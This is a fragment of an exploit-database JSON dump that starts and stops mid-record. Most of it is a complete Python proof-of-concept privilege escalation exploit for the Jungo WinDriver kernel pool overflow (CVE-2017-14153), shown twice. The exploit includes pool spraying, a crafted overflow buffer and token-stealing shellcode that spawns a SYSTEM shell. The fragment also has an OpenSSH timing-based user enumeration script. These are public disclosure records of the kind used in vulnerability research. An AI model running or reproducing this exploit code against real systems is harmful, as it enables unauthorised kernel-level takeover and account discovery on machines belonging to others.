PROCESSENTRY32(Structure): \n_fields_ = [ \n(\"dwSize\", c_ulong), \n(\"cntUsage\", c_ulong), \n(\"th32ProcessID\", c_ulong), \n(\"th32DefaultHeapID\", c_int), \n(\"th32ModuleID\", c_ulong), \n(\"cntThreads\", c_ulong), \n(\"th32ParentProcessID\", c_ulong), \n(\"pcPriClassBase\", c_long), \n(\"dwFlags\", c_ulong), \n(\"szExeFile\", c_wchar * MAX_PATH) \n] \n \nProcess32First = kernel32.Process32FirstW \nProcess32Next = kernel32.Process32NextW \n \ndef signed_to_unsigned(signed): \n\"\"\" \nConvert signed to unsigned integer. \n\"\"\" \nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed)) \nreturn unsigned \n \ndef get_type_info(handle): \n\"\"\" \nGet the handle type information to find our sprayed objects. \n\"\"\" \npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() \nsize = DWORD(sizeof(public_object_type_information)) \nwhile True: \nresult = signed_to_unsigned( \nntdll.NtQueryObject( \nhandle, 2, byref(public_object_type_information), size, None)) \nif result == STATUS_SUCCESS: \nreturn public_object_type_information.Name.Buffer \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(public_object_type_information, size.value) \nelif result == STATUS_INVALID_HANDLE: \nreturn None \nelse: \nraise x_file_handles(\"NtQueryObject.2\", hex (result)) \n \ndef get_handles(): \n\"\"\" \nReturn all the processes handles in the system at the time. \nCan be done from LI (Low Integrity) level on Windows 7 x86. \n\"\"\" \nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX() \nsize = DWORD (sizeof (system_handle_information)) \nwhile True: \nresult = ntdll.NtQuerySystemInformation( \nSystemExtendedHandleInformation, \nbyref(system_handle_information), \nsize, \nbyref(size) \n) \nresult = signed_to_unsigned(result) \nif result == STATUS_SUCCESS: \nbreak \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(system_handle_information, size.value) \nelse: \nraise x_file_handles(\"NtQuerySystemInformation\", hex(result)) \n \npHandles = cast( \nsystem_handle_information.Handles, \nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\ \nsystem_handle_information.NumberOfHandles) \n) \nfor handle in pHandles.contents: \nyield handle.UniqueProcessId, handle.HandleValue, handle.Object \n \ndef we_can_alloc_shellcode(): \n\"\"\" \nThis function allocates the shellcode @ the null page making \nsure the new OkayToCloseProcedure pointer points to shellcode. \n\"\"\" \nbaseadd = c_int(0x00000004) \nnull_size = c_int(0x1000) \n \ntokenstealing = ( \n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\" \n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\" \n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\" \n\"\\x00\" ) \n \nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078) \nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure \n \n# first we restore our smashed TypeIndex \nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c \nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a \nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c \nsc += tokenstealing \nsc += \"\\x90\" * (0x400-len(sc)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(null_size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: \nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written)) \nif write == 0: \nprint \"(-) error while writing our junk to the null paged memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_spray(): \n\"\"\" \nSpray the Kernel Pool with IoCompletionReserve and Event Objects. \nThe IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. \nThese are allocated from the Nonpaged kernel pool. \n\"\"\" \nhandles = [] \nIO_COMPLETION_OBJECT = 1 \nfor i in range(0, 25000): \nhandles.append(windll.kernel32.CreateEventA(0,0,0,0)) \nhHandle = HANDLE(0) \nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) \n \n# could do with some better validation \nif len(handles) > 0: \nreturn True \nreturn False \n \ndef alloc_pool_overflow_buffer(base, input_size): \n\"\"\" \nCraft our special buffer to trigger the overflow. \n\"\"\" \nprint \"(+) allocating pool overflow input buffer\" \nbaseadd = c_int(base) \nsize = c_int(input_size) \ninput = \"\\x41\" * 0x18 # offset to size \ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow) \ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod \ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA \ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer \n \n# repair the allocated chunk header... \ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER \ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount) \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock) \ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo) \n \n# filler \ninput += \"\\x44\" * (input_size-len(input)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: \nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff) \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written)) \nif write == 0: \nprint \"(-) error while writing our input buffer memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_trigger_the_pool_overflow(): \n\"\"\" \nThis triggers the pool overflow vulnerability using a buffer of size 0x460. \n\"\"\" \nGENERIC_READ = 0x80000000 \nGENERIC_WRITE = 0x40000000 \nOPEN_EXISTING = 0x3 \nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\" \ndwReturn = c_ulong() \ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) \ninputbuffer = 0x41414141 \ninputbuffer_size = 0x5000 \noutputbuffer_size = 0x5000 \noutputbuffer = 0x20000000 \nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) \nIoStatusBlock = c_ulong() \n \nif driver_handle: \ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, \ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) \nreturn True \nreturn False \n \ndef we_can_make_pool_holes(): \n\"\"\" \nThis makes the pool holes that will coalesce into a hole of size 0x460. \n\"\"\" \nglobal khandlesd \nmypid = os.getpid() \nkhandlesd = {} \nkhandlesl = [] \n \n# leak kernel handles \nfor pid, handle, obj in get_handles(): \n \n# mixed object attack \nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"): \nkhandlesd[obj] = handle \nkhandlesl.append(obj) \n \n# Find holes and make our allocation \nholes = [] \nfor obj in khandlesl: \n \n# obj address is the handle address, but we want to allocation \n# address, so we just remove the size of the object header from it. \nalloc = obj - 0x30 \n \n# Get allocations at beginning of the page \nif (alloc & 0xfffff000) == alloc: \nbin = [] \n \n# object sizes \nCreateEvent_size = 0x40 \nIoCompletionReserve_size = 0x60 \ncombined_size = CreateEvent_size + IoCompletionReserve_size \n \n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object \noffset = IoCompletionReserve_size \nfor i in range(offset, offset + (7 * combined_size), combined_size): \ntry: \n# chunks need to be next to each other for the coalesce to take effect \nbin.append(khandlesd[obj + i]) \nbin.append(khandlesd[obj + i - IoCompletionReserve_size]) \nexcept KeyError: \npass \n \n# make sure it's contiguously allocated memory \nif len(tuple(bin)) == 14: \nholes.append(tuple(bin)) \n \n# make the holes to fill \nfor hole in holes: \nfor handle in hole: \nkernel32.CloseHandle(handle) \nreturn True \n \ndef trigger_lpe(): \n\"\"\" \nThis function frees the IoCompletionReserve objects and this triggers the \nregistered aexit, which is our controlled pointer to OkayToCloseProcedure. \n\"\"\" \n# free the corrupted chunk to trigger OkayToCloseProcedure \nfor k, v in khandlesd.iteritems(): \nkernel32.CloseHandle(v) \nos.system(\"cmd.exe\") \n \ndef main(): \nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\" \nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\" \n \nif release() != \"7\" or architecture()[0] != \"32bit\": \nprint \"(-) although this exploit may work on this system,\" \nprint \" it was only designed for Windows 7 x86.\" \nsys.exit(-1) \n \nprint \"(+) spraying pool with mixed objects...\" \nif we_can_spray(): \nprint \"(+) sprayed the pool!\" \nprint \"(+) making pool holes...\" \nif we_can_make_pool_holes(): \nprint \"(+) made the pool holes!\" \nprint \"(+) allocating shellcode...\" \nif we_can_alloc_shellcode(): \nprint \"(+) allocated the shellcode!\" \nprint \"(+) triggering pool overflow...\" \nif we_can_trigger_the_pool_overflow(): \nprint \"(+) elevating privileges!\" \ntrigger_lpe() \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144046/jungowindriver-overflow.txt"}, {"lastseen": "2016-12-05T22:23:29", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "href": "https://packetstormsecurity.com/files/137942/OpenSSHD-7.2p2-User-Enumeration.html", "id": "PACKETSTORM:137942", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "sourceData": "`-------------------------------------------------------------------- \nUser Enumeration using Open SSHD (<=Latest version). \n------------------------------------------------------------------- \n \nAbstract: \n----------- \nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. \n \nCVE-ID \n--------- \nCVE-2016-6210 \n \nTested versions \n-------------------- \nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). \n \nFix \n----------------- \nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). \n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). \n \nDetails \n---------------- \nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. \nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users. \n \nSample code: \n---------------- \nimport paramiko \nimport time \nuser=raw_input(\"user: \") \np='A'*25000 \nssh = paramiko.SSHClient() \nstarttime=time.clock() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect('127.0.0.1', username=user, \npassword=p) \nexcept: \nendtime=time.clock() \ntotal=endtime-starttime \nprint(total) \n \n(Valid users will result in higher total time). \n \n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... \n \n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way. \n \nEddie Harari \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137942/openssh-enumerate.txt"}], "exploitdb": [{"lastseen": "2017-09-06T20:06:13", "bulletinFamily": "exploit", "description": "Jungo DriverWizard WinDriver - Kernel Pool Overflow. CVE-2017-14153. Local exploit for Windows platform", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EDB-ID:42624", "href": "https://www.exploit-db.com/exploits/42624/", "type": "exploitdb", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Users:(I)(F)\r\n Mandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\n Steven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n \"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Length\", USHORT),\r\n (\"MaximumLength\", USHORT),\r\n (\"Buffer\", LPWSTR),\r\n ]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Object\", c_void_p),\r\n (\"UniqueProcessId\", ULONG),\r\n (\"HandleValue\", ULONG),\r\n (\"GrantedAccess\", ULONG),\r\n (\"CreatorBackTraceIndex\", USHORT),\r\n (\"ObjectTypeIndex\", USHORT),\r\n (\"HandleAttributes\", ULONG),\r\n (\"Reserved\", ULONG),\r\n ]\r\n \r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"NumberOfHandles\", ULONG),\r\n (\"Reserved\", ULONG),\r\n (\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n ]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n \"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Name\", LSA_UNICODE_STRING),\r\n (\"Reserved\", ULONG * 22),\r\n ]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n _fields_ = [\r\n (\"dwSize\", c_ulong),\r\n (\"cntUsage\", c_ulong),\r\n (\"th32ProcessID\", c_ulong),\r\n (\"th32DefaultHeapID\", c_int),\r\n (\"th32ModuleID\", c_ulong),\r\n (\"cntThreads\", c_ulong),\r\n (\"th32ParentProcessID\", c_ulong),\r\n (\"pcPriClassBase\", c_long),\r\n (\"dwFlags\", c_ulong),\r\n (\"szExeFile\", c_wchar * MAX_PATH)\r\n ]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n \"\"\"\r\n Convert signed to unsigned integer.\r\n \"\"\"\r\n unsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\n return unsigned\r\n \r\ndef get_type_info(handle):\r\n \"\"\"\r\n Get the handle type information to find our sprayed objects.\r\n \"\"\"\r\n public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\n size = DWORD(sizeof(public_object_type_information))\r\n while True:\r\n result = signed_to_unsigned(\r\n ntdll.NtQueryObject(\r\n handle, 2, byref(public_object_type_information), size, None))\r\n if result == STATUS_SUCCESS:\r\n return public_object_type_information.Name.Buffer\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(public_object_type_information, size.value)\r\n elif result == STATUS_INVALID_HANDLE:\r\n return None\r\n else:\r\n raise x_file_handles(\"NtQueryObject.2\", hex (result))\r\n\r\ndef get_handles():\r\n \"\"\"\r\n Return all the processes handles in the system at the time.\r\n Can be done from LI (Low Integrity) level on Windows 7 x86.\r\n \"\"\"\r\n system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\n size = DWORD (sizeof (system_handle_information))\r\n while True:\r\n result = ntdll.NtQuerySystemInformation(\r\n SystemExtendedHandleInformation,\r\n byref(system_handle_information),\r\n size,\r\n byref(size)\r\n )\r\n result = signed_to_unsigned(result)\r\n if result == STATUS_SUCCESS:\r\n break\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(system_handle_information, size.value)\r\n else:\r\n raise x_file_handles(\"NtQuerySystemInformation\", hex(result))\r\n\r\n pHandles = cast(\r\n system_handle_information.Handles,\r\n POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\n system_handle_information.NumberOfHandles)\r\n )\r\n for handle in pHandles.contents:\r\n yield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n \"\"\" \r\n This function allocates the shellcode @ the null page making\r\n sure the new OkayToCloseProcedure pointer points to shellcode.\r\n \"\"\"\r\n baseadd = c_int(0x00000004)\r\n null_size = c_int(0x1000)\r\n\r\n tokenstealing = (\r\n \"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n \"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n \"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n \"\\x00\" )\r\n \r\n OkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\n sc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n # first we restore our smashed TypeIndex\r\n sc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\n sc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\n sc += \"\\x83\\xee\\x0c\" # sub esi, 0c \r\n sc += tokenstealing\r\n sc += \"\\x90\" * (0x400-len(sc))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(null_size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our junk to the null paged memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_spray():\r\n \"\"\"\r\n Spray the Kernel Pool with IoCompletionReserve and Event Objects. \r\n The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.\r\n These are allocated from the Nonpaged kernel pool.\r\n \"\"\"\r\n handles = []\r\n IO_COMPLETION_OBJECT = 1\r\n for i in range(0, 25000):\r\n handles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\n hHandle = HANDLE(0)\r\n handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n # could do with some better validation\r\n if len(handles) > 0:\r\n return True\r\n return False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n \"\"\"\r\n Craft our special buffer to trigger the overflow.\r\n \"\"\"\r\n print \"(+) allocating pool overflow input buffer\"\r\n baseadd = c_int(base)\r\n size = c_int(input_size)\r\n input = \"\\x41\" * 0x18 # offset to size\r\n input += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\n input += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\n input += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\n input += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n \r\n # repair the allocated chunk header...\r\n input += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\n input += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\n input += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n \r\n # filler\r\n input += \"\\x44\" * (input_size-len(input))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our input buffer memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n \"\"\"\r\n This triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n \"\"\"\r\n GENERIC_READ = 0x80000000\r\n GENERIC_WRITE = 0x40000000\r\n OPEN_EXISTING = 0x3\r\n DEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\n dwReturn = c_ulong()\r\n driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\n inputbuffer = 0x41414141\r\n inputbuffer_size = 0x5000\r\n outputbuffer_size = 0x5000\r\n outputbuffer = 0x20000000\r\n alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\n IoStatusBlock = c_ulong()\r\n\r\n if driver_handle:\r\n dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\n inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\n return True\r\n return False\r\n\r\ndef we_can_make_pool_holes():\r\n \"\"\"\r\n This makes the pool holes that will coalesce into a hole of size 0x460.\r\n \"\"\"\r\n global khandlesd\r\n mypid = os.getpid()\r\n khandlesd = {}\r\n khandlesl = []\r\n \r\n # leak kernel handles\r\n for pid, handle, obj in get_handles():\r\n\r\n # mixed object attack\r\n if pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\n khandlesd[obj] = handle\r\n khandlesl.append(obj)\r\n\r\n # Find holes and make our allocation\r\n holes = []\r\n for obj in khandlesl:\r\n\r\n # obj address is the handle address, but we want to allocation\r\n # address, so we just remove the size of the object header from it.\r\n alloc = obj - 0x30\r\n\r\n # Get allocations at beginning of the page\r\n if (alloc & 0xfffff000) == alloc:\r\n bin = []\r\n\r\n # object sizes\r\n CreateEvent_size = 0x40\r\n IoCompletionReserve_size = 0x60\r\n combined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\n offset = IoCompletionReserve_size \r\n for i in range(offset, offset + (7 * combined_size), combined_size):\r\n try:\r\n # chunks need to be next to each other for the coalesce to take effect\r\n bin.append(khandlesd[obj + i])\r\n bin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\n except KeyError:\r\n pass\r\n\r\n # make sure it's contiguously allocated memory\r\n if len(tuple(bin)) == 14:\r\n holes.append(tuple(bin))\r\n\r\n # make the holes to fill\r\n for hole in holes:\r\n for handle in hole:\r\n kernel32.CloseHandle(handle)\r\n return True\r\n\r\ndef trigger_lpe():\r\n \"\"\"\r\n This function frees the IoCompletionReserve objects and this triggers the \r\n registered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n \"\"\"\r\n # free the corrupted chunk to trigger OkayToCloseProcedure\r\n for k, v in khandlesd.iteritems():\r\n kernel32.CloseHandle(v)\r\n os.system(\"cmd.exe\")\r\n\r\ndef main():\r\n print \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\n print \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\n if release() != \"7\" or architecture()[0] != \"32bit\":\r\n print \"(-) although this exploit may work on this system,\"\r\n print \" it was only designed for Windows 7 x86.\"\r\n sys.exit(-1)\r\n\r\n print \"(+) spraying pool with mixed objects...\"\r\n if we_can_spray():\r\n print \"(+) sprayed the pool!\"\r\n print \"(+) making pool holes...\"\r\n if we_can_make_pool_holes():\r\n print \"(+) made the pool holes!\"\r\n print \"(+) allocating shellcode...\"\r\n if we_can_alloc_shellcode():\r\n print \"(+) allocated the shellcode!\"\r\n print \"(+) triggering pool overflow...\"\r\n if we_can_trigger_the_pool_overflow():\r\n print \"(+) elevating privileges!\"\r\n trigger_lpe()\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42624/"}, {"lastseen": "2016-07-18T13:28:25", "bulletinFamily": 